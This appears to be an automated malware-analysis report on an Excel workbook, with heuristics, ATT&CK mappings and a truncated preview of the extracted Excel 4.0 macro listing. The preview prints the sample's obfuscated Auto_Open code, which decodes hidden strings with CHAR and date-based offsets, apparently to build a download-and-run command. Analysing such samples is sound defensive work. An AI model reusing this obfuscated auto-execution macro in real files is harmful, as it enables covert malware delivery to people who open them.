MALICIOUS
142
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file contains Excel 4.0 macros, specifically an Auto_Open macro, which is a known technique for executing malicious code. The macro uses dangerous functions like RUN and appears to construct a string using character manipulation, likely to download and execute a payload. The presence of the 'PuRbH3OHt' string in the macro sheet and document body suggests it may be a key identifier or part of a constructed URL or command.
Heuristics 4
-
Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAMEoletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
-
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FNExcel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
-
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPENWorkbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.microsoft.com/photo/1.0/In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
xlm_macros.txt |
xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 24703 bytes |
SHA-256: 0a4d6fa1a3e00c667bee889fbf2b12918e14b311c234a5ee4ce65d3cbc26ef7a |
|||
Preview scriptFirst 1,000 lines of the extracted script
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 18 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, very hidden - PuRbH3OHt ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d PuRbH3OHt!BA1 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' Sheet,Reference,Formula,Value ' PuRbH3OHt,BA1,"FORMULA(DAY(NOW())+10,BA34)","" ' PuRbH3OHt,BA2,FULL.SCREEN(TRUE),"" ' PuRbH3OHt,BA3,"FORMULA(CHAR(A1-BA34)&CHAR(A2-BA34)&CHAR(A3-BA34)&CHAR(A4-BA34)&CHAR(A5-BA34)&CHAR(A6-BA34)&CHAR(A7-BA34)&CHAR(A8-BA34)&CHAR(A9-BA34)&CHAR(A10-BA34)&CHAR(A11-BA34)&CHAR(A12-BA34)&CHAR(A13-BA34)&CHAR(A14-BA34)&CHAR(A15-BA34)&CHAR(A16-BA34)&CHAR(A17-BA34)&CHAR(A18-BA34)&CHAR(A19-BA34)&CHAR(A20-BA34)&CHAR(A21-BA34)&CHAR(A22-BA34)&CHAR(A23-BA34)&CHAR(A24-BA34)&CHAR(A25-BA34)&CHAR(A26-BA34)&CHAR(A27-BA34)&CHAR(A28-BA34)&CHAR(A29-BA34)&CHAR(A30-BA34)&CHAR(A31-BA34)&CHAR(A32-BA34)&CHAR(A33-BA34)&CHAR(A34-BA34)&CHAR(A35-BA34)&CHAR(A36-BA34)&CHAR(A37-BA34)&CHAR(A38-BA34)&CHAR(A39-BA34)&CHAR(A40-BA34),BB1)","" ' PuRbH3OHt,BA4,"FORMULA(CHAR(B1-BA34)&CHAR(B2-BA34)&CHAR(B3-BA34)&CHAR(B4-BA34)&CHAR(B5-BA34)&CHAR(B6-BA34)&CHAR(B7-BA34)&CHAR(B8-BA34)&CHAR(B9-BA34)&CHAR(B10-BA34)&CHAR(B11-BA34)&CHAR(B12-BA34)&CHAR(B13-BA34)&CHAR(B14-BA34)&CHAR(B15-BA34)&CHAR(B16-BA34)&CHAR(B17-BA34)&CHAR(B18-BA34)&CHAR(B19-BA34)&CHAR(B20-BA34)&CHAR(B21-BA34)&CHAR(B22-BA34)&CHAR(B23-BA34)&CHAR(B24-BA34)&CHAR(B25-BA34)&CHAR(B26-BA34)&CHAR(B27-BA34)&CHAR(B28-BA34)&CHAR(B29-BA34)&CHAR(B30-BA34)&CHAR(B31-BA34)&CHAR(B32-BA34)&CHAR(B33-BA34)&CHAR(B34-BA34)&CHAR(B35-BA34)&CHAR(B36-BA34)&CHAR(B37-BA34)&CHAR(B38-BA34)&CHAR(B39-BA34)&CHAR(B40-BA34),BB2)","" ' PuRbH3OHt,BA5,"FORMULA(CHAR(C1-BA34)&CHAR(C2-BA34)&CHAR(C3-BA34)&CHAR(C4-BA34)&CHAR(C5-BA34)&CHAR(C6-BA34)&CHAR(C7-BA34)&CHAR(C8-BA34)&CHAR(C9-BA34)&CHAR(C10-BA34)&CHAR(C11-BA34)&CHAR(C12-BA34)&CHAR(C13-BA34)&CHAR(C14-BA34)&CHAR(C15-BA34)&CHAR(C16-BA34)&CHAR(C17-BA34)&CHAR(C18-BA34)&CHAR(C19-BA34)&CHAR(C20-BA34)&CHAR(C21-BA34)&CHAR(C22-BA34)&CHAR(C23-BA34)&CHAR(C24-BA34)&CHAR(C25-BA34)&CHAR(C26-BA34)&CHAR(C27-BA34)&CHAR(C28-BA34)&CHAR(C29-BA34)&CHAR(C30-BA34)&CHAR(C31-BA34)&CHAR(C32-BA34)&CHAR(C33-BA34)&CHAR(C34-BA34)&CHAR(C35-BA34),BB3)","" ' PuRbH3OHt,BA6,"FORMULA(CHAR(D1-BA34)&CHAR(D2-BA34)&CHAR(D3-BA34)&CHAR(D4-BA34)&CHAR(D5-BA34)&CHAR(D6-BA34)&CHAR(D7-BA34)&CHAR(D8-BA34)&CHAR(D9-BA34)&CHAR(D10-BA34)&CHAR(D11-BA34)&CHAR(D12-BA34)&CHAR(D13-BA34)&CHAR(D14-BA34)&CHAR(D15-BA34)&CHAR(D16-BA34)&CHAR(D17-BA34)&CHAR(D18-BA34)&CHAR(D19-BA34)&CHAR(D20-BA34)&CHAR(D21-BA34)&CHAR(D22-BA34)&CHAR(D23-BA34)&CHAR(D24-BA34)&CHAR(D25-BA34)&CHAR(D26-BA34)&CHAR(D27-BA34)&CHAR(D28-BA34)&CHAR(D29-BA34)&CHAR(D30-BA34)&CHAR(D31-BA34)&CHAR(D32-BA34)&CHAR(D33-BA34)&CHAR(D34-BA34)&CHAR(D35-BA34),BB4)","" ' PuRbH3OHt,BA7,"FORMULA(CHAR(E1-BA34)&CHAR(E2-BA34)&CHAR(E3-BA34)&CHAR(E4-BA34)&CHAR(E5-BA34)&CHAR(E6-BA34)&CHAR(E7-BA34)&CHAR(E8-BA34)&CHAR(E9-BA34)&CHAR(E10-BA34)&CHAR(E11-BA34)&CHAR(E12-BA34)&CHAR(E13-BA34)&CHAR(E14-BA34)&CHAR(E15-BA34)&CHAR(E16-BA34)&CHAR(E17-BA34)&CHAR(E18-BA34)&CHAR(E19-BA34)&CHAR(E20-BA34)&CHAR(E21-BA34)&CHAR(E22-BA34)&CHAR(E23-BA34)&CHAR(E24-BA34)&CHAR(E25-BA34)&CHAR(E26-BA34)&CHAR(E27-BA34)&CHAR(E28-BA34)&CHAR(E29-BA34)&CHAR(E30-BA34)&CHAR(E31-BA34)&CHAR(E32-BA34)&CHAR(E33-BA34)&CHAR(E34-BA34)&CHAR(E35-BA34)&CHAR(E36-BA34)&CHAR(E37-BA34)&CHAR(E38-BA34)&CHAR(E39-BA34)&CHAR(E40-BA34)&CHAR(E41-BA34)&CHAR(E42-BA34)&CHAR(E43-BA34)&CHAR(E44-BA34)&CHAR(E45-BA34)&CHAR(E4 ... (truncated) |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.